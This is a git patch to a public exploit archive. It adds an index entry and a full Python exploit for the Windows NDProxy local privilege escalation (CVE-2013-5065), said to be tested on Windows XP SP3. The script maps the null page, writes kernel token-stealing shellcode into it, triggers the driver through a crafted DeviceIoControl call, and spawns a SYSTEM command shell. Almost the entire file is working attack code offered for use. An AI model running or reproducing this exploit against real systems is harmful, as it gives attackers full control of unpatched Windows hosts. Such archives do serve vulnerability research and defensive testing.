From 2039e282e8de526356ea3b7063a60b845b5de15e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 4 Dec 2013 05:28:26 +0000 Subject: [PATCH] Updated 12_04_2013 --- files.csv | 1 + platforms/windows/local/30014.py | 79 ++++++++++++++++++++++++++++++++ 2 files changed, 80 insertions(+) create mode 100755 platforms/windows/local/30014.py diff --git a/files.csv b/files.csv index ee30f460b..901d1bfa3 100755 --- a/files.csv +++ b/files.csv @@ -26963,3 +26963,4 @@ id,file,description,date,author,platform,type,port 30011,platforms/windows/remote/30011.rb,"Microsoft Tagged Image File Format (TIFF) Integer Overflow",2013-12-03,metasploit,windows,remote,0 30012,platforms/php/webapps/30012.txt,"Chamilo LMS 1.9.6 (profile.php, password0 param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 30013,platforms/php/webapps/30013.txt,"Dokeos 2.2 RC2 (index.php, language param) - SQL Injection",2013-12-03,"High-Tech Bridge SA",php,webapps,80 +30014,platforms/windows/local/30014.py,"NDPROXY Local SYSTEM Privilege Escalation",2013-12-03,"Matteo Memelli",windows,local,0 diff --git a/platforms/windows/local/30014.py b/platforms/windows/local/30014.py new file mode 100755 index 000000000..670df76f0 --- /dev/null +++ b/platforms/windows/local/30014.py @@ -0,0 +1,79 @@ +# NDPROXY Local SYSTEM privilege escalation +# http://www.offensive-security.com +# Tested on Windows XP SP3 + + +# Original crash ... null pointer dereference +# Access violation - code c0000005 (!!! second chance !!!) +# 00000038 ?? ??? + +from ctypes import * +from ctypes.wintypes import * +import os, sys + +kernel32 = windll.kernel32 +ntdll = windll.ntdll + +GENERIC_READ = 0x80000000 +GENERIC_WRITE = 0x40000000 +FILE_SHARE_READ = 0x00000001 +FILE_SHARE_WRITE = 0x00000002 +NULL = 0x0 +OPEN_EXISTING = 0x3 +PROCESS_VM_WRITE = 0x0020 +PROCESS_VM_READ = 0x0010 +MEM_COMMIT = 0x00001000 +MEM_RESERVE = 0x00002000 +MEM_FREE = 0x00010000 +PAGE_EXECUTE_READWRITE = 0x00000040 +PROCESS_ALL_ACCESS = 2097151 +FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000 +baseadd = c_int(0x00000001) +MEMRES = (0x1000 | 0x2000) +MEM_DECOMMIT = 0x4000 +PAGEEXE = 0x00000040 +null_size = c_int(0x1000) +STATUS_SUCCESS = 0 + +def log(msg): + print msg + +def getLastError(): + """[-] Format GetLastError""" + buf = create_string_buffer(2048) + if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, + kernel32.GetLastError(), 0, + buf, sizeof(buf), NULL): + log(buf.value) + else: + log("[-] Unknown Error") + +print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day" +print "[*] Vulnerability found in the wild" +print "[*] Coded by Offensive Security" + +tmp = ("\x00"*4)*5 + "\x25\x01\x03\x07" + "\x00"*4 + "\x34\x00\x00\x00" + "\x00"*(84-24) +InBuf = c_char_p(tmp) + +dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE) +if dwStatus != STATUS_SUCCESS: + print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus + getLastError() +written = c_ulong() +sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3" +sc = "\x90"*0x38 + "\x3c\x00\x00\x00" + "\x90"*4 + sh + "\xcc"*(0x400-0x3c-4-len(sh)) +alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written)) +if alloc == 0: + print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc + getLastError() + +dwRetBytes = DWORD(0) +DEVICE_NAME = "\\\\.\\NDProxy" +hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None) +if hdev == -1: + print "[-] Couldn't open the device... :(" + sys.exit() +kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0) +kernel32.CloseHandle(hdev) +print "[+] Spawning SYSTEM Shell..." +os.system("start /d \"C:\\windows\\system32\" cmd.exe") \ No newline at end of file